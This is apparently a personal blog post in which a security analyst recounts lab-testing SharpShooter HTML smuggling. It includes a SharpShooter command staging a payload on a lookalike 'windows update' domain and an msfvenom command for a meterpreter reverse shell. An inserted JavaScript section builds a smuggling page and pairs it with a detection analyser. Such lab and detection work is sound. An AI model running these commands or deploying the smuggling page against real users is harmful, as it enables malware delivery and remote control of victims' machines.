3 hours into the night. I find myself bored as shit. I was covering my buddy's shift in the SOC since he had plans with his girlfriend. There were no events going on. No active incidents. No emails to respond to, nor things I felt like doing on the midnight shift. I perused /r/netsec and made it through the new posts fairly quickly. 9 hours left on my shift and I decided that I would play with new tools instead of watching movies. I'm a blue team lead by trade and moonlight in the SOC, but I like to play with new red team tools to stay sharp and to ensure I can exercise my team.
I read about this C# payload delivery mechanism in some slides I found on Reddit. Even though it's pretty simple, I find HTML smuggling really interesting and a difficult problem to pick up in my tools, both on my homelab and enterprise networks.
So since I don't have direct access to my lab, I'm running three browser windows with Guacamole to connect to three different VMs to try and do something. One is for doing research on, the other has msfconsole open and the third is my Windows 7 VM that is littered with malware. lol.
So the gist of it is that I needed to generate some shellcode that SharpShooter could package up. Seems easy enough. I browse to shell-storm and try to find a nice calc.exe thingy since that always gives me a good laugh.
I package it up with SharpShooter using the command
python SharpShooter.py --payload hta --delivery web --web http://vvindowsupdate.com/wild.payload --shellcode --scfile ./hello.txt --smuggle --template mcafee --dotnetver 2 --output wild
where my shellcode is in hello.txt.
I get really excited since my payload is created and I see my HTML page that is the delivery mechanism.
I dump it in our malware Slack channel, download it on my malware VM and open the HTML file.
AND NOTHING HAPPENS!!
Me, eager as a child on Christmas morning, watching my payload fail. GAAAAHHHHHHHHHH.
I switch over to my Sysinternals directory, pop open Procmon and watch the child process spawn under Chrome and then die.
I sit there confused.
The firewall shouldn't be getting in the way, and the handler is listening on my other box.
I fiddle with settings for two hours and eventually I get annoyed. I check the GitHub and conclude I'm doing something wrong.
After attending to some actual work things, I try again and decide to switch from the reverse_http they use in the video to a reverse_tcp.
msfvenom -a x86 -p windows/meterpreter/reverse_tcp LHOST=192.168.1.198 LPORT=80 EnableStageEncoding=True PrependMigrate=True -f csharp > dump.txt
Boom. Instant shell.
To summarize what I did: I was able to generate a payload and a delivery mechanism using SharpShooter.
I then dropped the payload at https://vvindowsupdate.com/wild.payload
The HTML was sent to the user, but it's not crazy that it could be used in a watering hole attack as well.
I sit there somewhat satisfied. The fact that I was able to use an HTML doc to smuggle in code whose only purpose was to sit on disk and reach out to some C2 domain to grab a payload and pop it into memory via DotNetToJScript is kinda cool.
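To make the smuggling step concrete, here is an added example (my own code, not SharpShooter's and not from Dominic's post) of the client-side reassembly the delivery page relies on, paired with a small analyser a blue team can run over a captured page. It assumes Node.js (it uses the Buffer global), a constructed harmless text file standing in for the dropper, an assumed indicator list and extension list for the analyser, and a page layout of my own; SharpShooter's --smuggle template is built on the same idea but is not reproduced here.

```javascript
// Added example, not SharpShooter's code: a minimal HTML smuggling page
// builder plus an analyser that recovers the smuggled file from the page.
// Runs under Node.js (uses the Buffer global). The sample payload below is
// a constructed, harmless text file; a real kit would embed its dropper.

// Indicators of client-side file reassembly (assumed heuristics, not a
// vendor signature): the base64 decoder, the Blob constructor, the object
// URL, the anchor download attribute and the legacy IE save API.
const INDICATORS = [
  /\batob\s*\(/,
  /new\s+Blob\s*\(/,
  /URL\.createObjectURL\s*\(/,
  /\.download\s*=/,
  /msSaveOrOpenBlob/,
];

// Extensions worth flagging when they appear as a string literal in the
// page (assumed list for this example).
const DROPPER_EXT = /"([\w.-]+\.(?:hta|js|jse|vbs|wsf|exe|lnk|iso|img|zip))"/i;

// Build the delivery page. The file never crosses the wire as a download:
// it rides inside the HTML as base64 and is rebuilt by the browser.
function buildSmugglingPage(payloadBytes, fileName, mimeType) {
  const b64 = Buffer.from(payloadBytes).toString('base64');
  return `<!DOCTYPE html>
<html>
<head><meta charset="utf-8"><title>Update</title></head>
<body>
<p>Please wait while your download starts...</p>
<script>
  // Decode the embedded bytes, wrap them in a Blob and hand the Blob to the
  // browser as if the user had clicked a download link.
  var b64 = "${b64}";
  var bin = atob(b64);
  var bytes = new Uint8Array(bin.length);
  for (var i = 0; i < bin.length; i++) { bytes[i] = bin.charCodeAt(i); }
  var blob = new Blob([bytes], { type: "${mimeType}" });
  var name = "${fileName}";
  if (window.navigator.msSaveOrOpenBlob) {
    window.navigator.msSaveOrOpenBlob(blob, name); // legacy IE / old Edge path
  } else {
    var a = document.createElement("a");
    a.href = URL.createObjectURL(blob);
    a.download = name;
    document.body.appendChild(a);
    a.click();
    URL.revokeObjectURL(a.href);
  }
</script>
</body>
</html>`;
}

// Analyst side: count the reassembly indicators and recover the embedded
// file the same way the browser would, so the dropped artifact can be hashed
// or detonated without rendering the page.
function analyseSmugglingPage(html) {
  const indicatorsMatched = INDICATORS.filter((re) => re.test(html)).length;

  // Pick the longest base64-looking string literal as the payload candidate.
  const literals = [...html.matchAll(/"([A-Za-z0-9+/]{16,}={0,2})"/g)].map((m) => m[1]);
  const longest = literals.reduce((best, s) => (s.length > best.length ? s : best), '');
  const payload = longest ? Buffer.from(longest, 'base64') : null;

  const ext = html.match(DROPPER_EXT);
  return {
    indicatorsMatched,
    suspicious: indicatorsMatched >= 3 && payload !== null,
    fileName: ext ? ext[1] : null,
    payload,
  };
}

// Constructed demo input: a harmless text "dropper" that only names a host.
const SAMPLE_PAYLOAD = Buffer.from('CONSTRUCTED SAMPLE - would fetch http://example.invalid/wild.payload\n');
const SAMPLE_PAGE = buildSmugglingPage(SAMPLE_PAYLOAD, 'wild.hta', 'application/hta');
const SAMPLE_REPORT = analyseSmugglingPage(SAMPLE_PAGE);
```

The point for detection is visible in what crosses the wire: a text/html response carrying one long string literal, never a file download with a telling MIME type or extension, which is why a proxy that only inspects downloads misses it. The analyser shows the counter-move: the browser's decode step is deterministic, so the dropped artifact can be recovered statically from the captured page and hashed or detonated before anyone opens it.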
Granted, I didn't write it myself, but I still marveled that it worked. Or maybe I was just delirious since it was 4:30 in the morning.
Anyway, major props to https://twitter.com/domchell, and check out his original blog post here: https://www.mdsec.co.uk/2018/03/payload-generation-using-sharpshooter/